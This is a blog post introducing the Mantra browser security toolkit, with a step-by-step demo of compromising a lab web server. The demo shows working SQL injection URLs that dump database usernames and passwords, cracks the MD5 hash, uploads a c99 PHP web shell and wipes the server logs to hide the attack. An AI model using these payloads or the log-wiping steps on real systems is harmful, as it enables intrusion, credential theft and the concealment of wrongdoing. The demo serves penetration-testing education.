Mantra – Free and Open Source Security Framework

February 7, 2011, by | Start Discussion


Right from the beginning, one Firefox and Google Chrome of the attractive features which made both of them outstanding was their expandability by means of installing useful extensions or add-ons. Programmers and developers started coding add-ons which helped to make the online web more easy and functional.
Naturally, there were add-ons developed for hackers too. Some went out dated, some were very powerful, and some
went unnoticed despite their powerful capabilities. We tried to get all the add-ons
of this type available out there on the internet, installed, analyzed, ranked and after that included them
on our own security toolkit.

By looking at the total number of exploit getting added to the exploit db, we think that an exploit development framework based on the browser can get very good acceptance from the security and hacking communities and this triggered the making of Mantra.

As of now Mantra is just a security toolkit rather than a full-fledged framework. We think it’s always better to give a choice to the end user rather than providing what we think is the best. So once the community is up and we have a crowd, we will go ahead and finalize the basic criteria for framework the and will work on their behalf.

Some of the features of Mantra
1. Its built on top of the browser – Saves lots of man power and learning curve.
2. It is Cross platform and flexible – It can easily run on Windows, Mac and Linux natively
3. Its free as “free beer” and “free speech”
4. Its open source, so you are free to use it or modify it your own way.

What is the use?
According to the present age standards, Mantra can be helpful to perform all five phases of attacks like reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining
access and covering tracks.

What Mantra is NOT?
1. It’s Not a one click automatic Pwnage tool
(please don’t think that it’s a stick in a magician’s hand. May be it be possible for us to make it a one click pwnage tool at least for some common types of attacks in the future. But not now)

2.It’s not mature enough to serve “everything” for a user to perform any sort of attack

3.It can’t be used as a replacement for your normal browser. It’s not fast enough, does not have plenty of space to play with etc.

4. You can find that there is more than one tool present in the toolkit for performing same sort of attacks but at the same time it lacks some simple tools here and there.

Who needs it?
Nice question. If you are into auditing, vulnerability assessment, penetration testing or information security training etc., you are going to be benefited from this project. We are looking out for bringing attention of the security researchers to the possibility of such a platform. If many people are use it, definitely  the community will grow and we will be able to see more powerful functional and targeted tools
in the near future.

How you can contribute?
Since it’s an open source project, you are encouraged to become a part of it. We need developers for writing codes, modifying extension framework, theme designers for artworks and documentation writers to help better promote the project.

Close Look
Beta version of Mantra Security Toolkit can be downloaded from  http://getmantra.com/download/. As of now its available for both Linux and Windows platforms. It comes as a self extracting archive and needs almost
zero setup.

The graphical user interface provided by Mantra security toolkit is straight forward and easy to use.

The navigation bar is placed on top of the toolkit and it integrates the search bar into it. Search engines can be switched easily by using keywords or by clicking on their respective icons. As of now it supports searching on XSSed, SecurityFocus, OSVDB, PacketStorm, Pcapr, Extploit-DB, Scroogle, RFC, OVAL etc apart from normal search engines. It also supports auto-complete and real-time search suggestions.

The sidebar is located on the right side of the toolkit which gives one click access to all the tools available on the toolkit. Tools can be fine tuned according to the user’s needs  from the sidebar itself. You can see all the tools packed into it at http://getmantra.com/tools/

The status bar on the bottom gives various information about the current webpage including remote IP, location details, technologies used etc. More details about particular information can be obtained by simply clicking on the respective notifications on the status bar. There are also a proxy button, to switch between proxies, Passive Reconnaissance button, to conduct packet less discovery of target resources, quick profile switcher to play with cookies etc.

A quick demo
In this particulate demo we will try to root a remote web server using Mantra security toolkit.
Due to space limitation, I have not included the screen shots. To view them please follow the image links mentioned under every step.
Step 1:
I’m on the home page of the website now.
[code]http://192.168.132.128/[/code]

Step 2:
As of now Mantra does not have any crawling mechanism to find vulnerable URLs on the website (read it as a limitation). So we have to do that manually. I went through all the pages of web site and found a page with URL input
[code]http://192.168.132.128/?id=13[/code]

Step 3:
I launched Hackbar by pressing F9. Hackbar is a tool for doing basic audits on web pages.

Step 4:
The power of single quote. I’m checking the web site is actually sanitizing the input or not by putting a ‘ at the end of the URL and pressing on the Execute button.
[code]http://192.168.132.128/?id=13′[/code]

Since the page content is different from the previous one. I can make sure that the web page is not sanitizing the input from the URL.

Step 5:
Let’s find out the number of tables in the current database.
[code]http://192.168.132.128/?id=13 order by 1[/code]

Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice it’s going to be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
[code]http://192.168.132.128/?id=13 order by 7[/code]

Step 7:
I went up to 7 and no change till now.
[code]http://192.168.132.128/?id=13 order by 7[/code]

Step 8:
I’m on 8 now and now I can see the page changed.
[code]http://192.168.132.128/?id=13 order by 8[/code]

Step 9:
Now let’s go ahead and make a UNION statement. I can make it easily by going to SQL > UNION SELECT STATEMENT

Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exist and there are only 7 tables.

Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7[/code]

Step 12:
I replaced number 2 in URL with another SQL command, it got executed and the result is displayed on the page.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7[/code]

The current user is [email protected]

Step 13:
Let’s find out the version of the database. I replaced 2 in the URL with version() command.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7[/code]

5.0.45 is the version

Step 14:
Let me list all the tables.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables[/code]

From this list I found “user” as an interesting table.

Step 15:
Now I listed all the columns and its a big list.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns[/code]

Step 16:
I want to filter out columns from the table “user”.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name=’user'[/code]

Step 17:
Lets find the user name.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user[/code]

Step 18:
And password, of course.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user[/code]

Its encrypted.

Step 19:
Decrypting the password. I’m making a guess here that the password is encrypted using MD5 by looking at the length and other parameters of the data. I copied the MD5 hash, pasted it into the hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com

Step 20:
Voila.!!! I got the password!

Step 21:
Finding the log in page. Its was right in front of me

Step 22:
Logging in with the credentials I have

Step 23:
Greetings.!!!

Step 24:
I’m an admin now. Look at my powers.

Step 25:
Let me add an event.

Step 26:
And of course I want to upload a picture.

Step 27:
Let me test the filtering mechanism of the website again. I’m trying to upload a PHP shell using the facility of website to upload custom picture. Lets see whether its possible or not.

Step 28:
Now I’m pressing on “Add Event” button.

Step 29:
Nice. Looks like it’s got uploaded.

Step 30:
Let’s see where the shell got uploaded to.

Step 31:
I’m trying to get the default upload location.

Step 32:
Looks like I got it.

Let me click on the c9shell.php file I just uploaded.
Step 33:
Voila. I have shell access!!

Step 34:
I simply clicked on the up button to get the root folder.

Now I can do whatever I wish. Deface the website, maintaining access or whatever.

Step 35:
What I’m interested is the log folder.

Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks.

Step 37:
Let me go back and edit the log file.

Step 38:
I deleted the complete log entries. Now saving it.

Step 39:
Nice. Log file is empty now.

Step 40:
Now, let’s remove the c99 shell by pressing on Self Remove.

Step 41:
Confirmed!!!

Step 42:
OK. Good Bye C99!!!

Step 43:
Well. It got deleted itself.

Happy Hacking.!!! 🙂

If you have any suggestion or query please mail us at [email protected]
Or you can also contact us at:
getmantra.com/forums
twitter.com/getmantra
facebook.com/pages/Mantra/170787489627527

Yashartha Chaturvedi is an Independent cyber security consultant, believes in ethical hacking, provides innovative solutions and knowledge based training to secure computer/mobile from cyber criminals, having an aim to educate the common internet user against the most dangerous security loopholes, vulnerabilities and attacks by publishing regular updates/patches.

Leave a Reply